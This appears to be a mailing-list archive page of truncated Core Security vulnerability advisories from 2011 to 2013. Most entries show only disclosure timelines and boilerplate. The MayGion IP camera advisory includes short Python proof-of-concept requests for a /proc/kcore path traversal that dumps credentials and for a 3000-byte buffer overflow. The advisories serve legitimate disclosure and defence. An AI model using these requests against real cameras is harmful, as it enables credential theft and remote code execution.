[Full-disclosure] CORE-2013-0430 - Buffer overflow in Ubiquiti airCam RTSP service
: 0x41414141 0x41414141 0x41414141 0x12345678 0x40a7eaf0: 0x76696c2f 0x68632f65 0x305f3030 0x000d7100 0x40a7eb00: 0x000c6060 0x000c6119 0x00059340 0x000491a8 0x40a7eb10: 0x000d73f6 0x000c6267 0x0001 0x000c6060 0x40a7eb20: 0x000c6119 0x00059340 0x000c6118 0x00049780 0x40a7eb30: 0x 0x000c611c -/ 9. *Report Timeline* . 2013-05-02: Core Security Technologies notifies the Ubiquiti team of the vulnerability. Publication date is set for May 29th, 2013. . 2013-05-02: Vendor acknowledges the receipt of the email and asks for technical details. . 2013-05-02: A draft report with technical details and a PoC sent to Ubiquiti team. . 2013-05-03: Vendor notifies that a new firmware version should address this vulnerability. It will be released shortly to the alpha and beta community. . 2013-05-06: Core notifies that the advisory will be re-scheduled to be released when patches are available to the alpha and beta community and asks for a tentative release date. . 2013-05-09: Core asks for a status update regarding this vulnerability and a tentative release date. . 2013-05-13: Vendor notifies the firmware is still in internal testing and the release date will be confirmed in the following days. . 2013-05-27: Core notifies that there was no answer in the last 2 weeks regarding the release date. Core also notifies that the advisory was re-scheduled for Jun 4th, and asks for a clear timeline to justify keep delaying the release. . 2013-05-28: Vendor notifies that the new firmware is almost done and a confirmed date will be notified in the following days. . 2013-05-29: Core asks if a beta firmware is available for downloading. . 2013-05-29: Vendor notifies that they have a v1.1.6 build of the firmware which is being tested internally and will be released very soon, probably this week. However, it is not yet available on the ubnt.com/download site. . 2013-05-29: First release date missed. . 2013-06-03: Core asks for a status update. . 2013-06-03: Vendor notifies that they do not have a specific release date yet. . 2013-06-11: Vendor notifies that they released firmware 1.2.0 along with airVision 2 [2][3], and a public announcement will be made soon. Release of firmware 1.1.6 (for the airVision 1.x platform) has to be defined. . 2013-06-11: Advisory CORE-2013-0430 published. 10. *References* [1] http://www.ubnt.com. [2] Ubiquiti downloads http://www.ubnt.com/download#AirCam. [3] Ubiquiti firmware v1.2.0 http://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2013-0517 - Xpient Cash Drawer Operation Vulnerability
to active users of Xpient software. Vendor requires to remove the Proof of Concept (PoC) and technical details from Core's report. . 2013-06-04: Core notifies that the advisory is re-scheduled for Jun 5th and will include the PoC since it gives the users a tool to assess the risks they are running and the effectiveness of possible countermeasures and workarounds. . 2013-06-05: Advisory CORE-2013-0517 is published. 10. *References* [1] http://www.xpient.com 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2013-0103] Mac OSX Server DirectoryService buffer overflow
. . 2013-06-04: Advisory CORE-2013-0103 released. 9. *References* [1] http://opensource.apple.com/source/DirectoryService/DirectoryService-621/Proxy/DSTCPEndpoint.cpp [2] https://www.dlitz.net/software/pycrypto/ [3] http://support.apple.com/kb/HT5501 - DirectoryService [4] https://appleseed.apple.com 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2013-0302 - Zavio IP Cameras multiple vulnerabilities
=dateGeneral.Time.DayLightSaving.Start.Month=01General.Time.DayLightSaving.Stop.Month=01General.Time.DayLightSaving.Start.Week=1General.Time.DayLightSaving.Stop.Week=1General.Time.DayLightSaving.Start.Day=01General.Time.DayLightSaving.Stop.Day=01General.Time.DayLightSaving.Start.Date=01General.Time.DayLightSaving.Stop.Date=01General.Time.DayLightSaving.Start.Hour=00General.Time.DayLightSaving.Stop.Hour=00General.Time.DayLightSaving.Start.Min=00General.Time.DayLightSaving.Stop.Min=00Image.OSD.Enabled=off -/ 9. *Report Timeline* . 2013-03-19: Core Security Technologies notifies the Zavio Tech Support and requests a security manager to send a draft report regarding these vulnerabilities. No reply received. . 2013-05-02: Core asks Zavio Tech Support for a security manager to send a confidential report. . 2013-05-09: Core asks for a reply. . 2013-05-14: Core asks for a reply. . 2013-05-21: Core tries to contact vendor for last time without any reply. . 2013-05-28: After 5 failed attempts to report the issues, the advisory CORE-2013-0302 is published as 'user-release'. 10. *References* [1] http://www.zavio.com/product.php?id=25. [2] http://zavio.com/product.php?id=23. [3] http://www.boa.org/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2013-0322 - MayGion IP Cameras multiple vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ MayGion IP Cameras multiple vulnerabilities 1. *Advisory Information* Title: MayGion IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0322 Advisory URL: http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: MayGion Release mode: Coordinated release 2. *Vulnerability Information* Class: Path traversal [CWE-22], Buffer overflow [CWE-119] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1604, CVE-2013-1605 3. *Vulnerability Description* Multiple vulnerabilities have been found in MayGion IP cameras [1] based on firmware v09.27 and below, that could allow an unauthenticated remote attacker: 1. [CVE-2013-1604] to dump the camera's memory and retrieve user credentials, 2. [CVE-2013-1605] to execute arbitrary code. 4. *Vulnerable Packages* . MayGion IP cameras based on firmware 2011.27.09. . Other firmware versions are probably affected too but they were not checked. 5. *Non-Vulnerable Packages* . H.264 ipcam firmware 2013.04.22. 6. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. 7. *Technical Description / Proof of Concept Code* 7.1. *User Credentials Leaked via Path Traversal* [CVE-2013-1604] The following Python code exploits a path traversal and dumps the camera's memory. Valid user credentials can be extracted from this memory dump by an unauthenticated remote attacker. /- import httplib conn = httplib.HTTPConnection(192.168.100.1) conn.request(GET, /../../../../../../../../../proc/kcore) resp = conn.getresponse() data = resp.read() conn.close() -/ 7.2. *Buffer overflow* [CVE-2013-1605] The following Python script can be used to trigger the vulnerability without authentication. As a result, the Instruction Pointer register (IP) will be overwritten with 0x61616161, which is a typical buffer overrun condition. /- import httplib conn = httplib.HTTPConnection(192.168.100.1) conn.request(GET, / + A * 3000 + .html) resp = conn.getresponse() data = resp.read() conn.close() -/ 8. *Report Timeline* . 2013-05-02: Core Security Technologies notifies MayGion of the vulnerabilities. Publication date is set for May 29th, 2013. . 2013-05-02: Vendor asks for a report with technical information. . 2013-05-03: A draft advisory containing technical details sent to MayGion team. . 2013-05-03: Vendor notifies that all vulnerabilities were fixed in the last firmware version, released April 22nd, 2013. . 2013-05-09: Core asks for a list of affected devices and firmware. No reply received. . 2013-05-28: Advisory CORE-2013-0322 is published. 9. *References* [1] http://www.maygion.com 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full
[Full-disclosure] CORE-2013-0318 - TP-Link IP Cameras Multiple Vulnerabilities
center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2013-0301 - Vivotek IP Cameras Multiple Vulnerabilities
Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2013-0303 - D-Link IP Cameras Multiple Vulnerabilities
3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2012-1128 - SAP Netweaver Message Server Multiple Vulnerabilities
/bdc344cc104231e1000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e1000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-1123 - Windows Kernel ReadLayoutFile Heap Overflow
still stands. . 2012-03-12: MSRC notifies that, due to some late findings about app-compat concerns, they will need more time to issue the patch. MSRC asks to re-schedule the advisory publication to May 8th. . 2012-03-09: Core re-schedules the advisory publication to May 8th. . 2012-04-01: Pedro Varangot leaves the Core Advisories Team. Thanks Peter and good luck with your new challenges. . 2012-04-02: Core asks for additional information regarding the actual vulnerable Windows' versions and specific workarounds for this vulnerability. . 2012-04-03: MSRC notifies that the actual vulnerable systems are Windows XP/2003 as Elevation of Privileges and Windows Vista/2008 as Denial of Service. MSRC also notifies that no workaround has been identified for this vulnerability. . 2012-05-08: The advisory CORE-2011-1123 is published. . 2012-05-08: MSRC publishes the Security Bulletin MS12-034 [3] for addressing this issue. . 2012-05-11: Core notifies MSRC that the vulnerability was not correctly patched in [3] and re-sends a PoC to reproduce the issue. . 2012-05-14: Based on the blog post [5], MSRC asks for a PoC which triggers the issue in a Vista/Windows 7 platform. . 2012-05-14: Core clarifies that this issue seems to be not exploitable in Windows 7 (as it was noted in the blog post [5]), but it is still exploitable in Windows Vista and 2008. Core also notifies that the exploit for this vulnerability was sent to the Core Impact clients on May 8th, 2012. . 2012-05-16: MSRC notifies that a new patch will be released and a new CVE number will be assigned to it. . 2012-05-17: Core acknowledges the update and asks a publication date for this update. . 2012-05-18: MSRC asks for a conference call to discuss this issue and asks Core to make no change on the advisory or the blog post until the publication day. . 2012-05-18: Core requests to keep all the communication process via email in order to track all interactions and involve all people interested in it. Core also notifies that the advisory update will be released after the new patch is published. . 2012-06-14: Core asks MSRC for additional information regarding this issue. . 2012-06-18: MSRC notifies that they are targeting July as publication timeframe for this issue. . 2012-06-21: Core acknowledges the publication date and asks for the new CVE number and any additional information that can be added in the advisory amendment. . 2012-07-05: MSRC informs that the new bulletin will be published on July 10th, and the new CVE number is CVE-2012-1890. . 2012-07-10: MSRC publishes the Security Bulletin Summary for July 2012 [6]. . 2012-07-11: The advisory CORE-2011-1123 is updated. 9. *References* [1] http://www.exploit-db.com/exploits/18140/ [2] http://msdn.microsoft.com/en-us/library/windows/desktop/ms646305(v=vs.85).aspx [3] http://technet.microsoft.com/en-gb/security/bulletin/ms12-034 [4] http://technet.microsoft.com/en-gb/security/bulletin/ms12-047 [5] http://blog.coresecurity.com/2012/05/10/the-big-trick-behind-exploit-ms12-034/ [6] http://technet.microsoft.com/en-us/security/bulletin/ms12-jul 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files
[Full-disclosure] CORE-2012-0530 - Lattice Diamond Programmer Buffer Overflow
; TDILOW; TDOLOW; TRSTABSENT; CableENHIGH; /PinSetting /ProjectOptions /ispXCF -/ 9. *Report Timeline* . 2012-05-30: Core Security Technologies notifies Lattice Semiconductor Corporation of the vulnerability. Publication date is set for June 26th, 2012. . 2012-06-06: Core notifies Lattice Semiconductor Corporation of the vulnerability. . 2012-06-11: Core notifies that the previous emails were not answered and requests for a reply. . 2012-06-11: Vendor asks Core to remove their email addresses from Core's mailing lists. . 2012-06-11: Core requests an email address or any other security contact information at Lattice in order to begin discussions in regards to the vulnerability. No reply was received. . 2012-06-21: Advisory CORE-2012-0530 published. 10. *References* [1] http://www.latticesemi.com/products/designsoftware/diamond/index.cfm. [2] Lattice technical support, mailto:techsupp...@latticesemi.com. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2012-0123 - SAP Netweaver Dispatcher Multiple Vulnerabilities
this date cannot be guaranteed. . 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). . 2012-05-07: Core asks again for the status of the fix. . 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. . 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. . 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe1000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0919: Apple OS X Sandbox Predefined Profiles Bypass
in the PoC just to keep it simple) an attacker could circumvent the restriction. So, at the end, sockets-based networking is used. . 2010-10-18: Vendor responds that it is currently considering modifying its documentation to explicitly point out what Core described; namely, that the restrictions that these particular sandbox profiles provide are limited to the process in which the sandbox is applied. . 2011-11-10: The advisory CORE-2011-0919 is published as user release. 10. *References* [1] App Sandbox Design Guide -- Designing for App Sandbox http://developer.apple.com/library/mac/#documentation/Security/Conceptual/AppSandboxDesignGuide/DesigningYourSandbox/DesigningYourSandbox.html [2] Charlie Miller, Hacking OS X, Black Hat Japan 2008 https://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (MingW32) iEYEARECAAYFAk68OxMACgkQyNibggitWa0YWgCfYbGm9R0+YJw6CxP6TNwdhEWr 9ZMAn16nqBqNbO582D5QpejeuTEV5RAj =HruN -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0825: Adobe Shockwave Player TextXtra.x32 vulnerability
: The advisory CORE-2011-0825 is published. 10. *References* [1] Security bulletin for Adobe Shockwave Player http://www.adobe.com/support/security/bulletins/apsb11-27.html [2] Upgrade Adobe Shockwave Player http://get.adobe.com/shockwave/ 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and 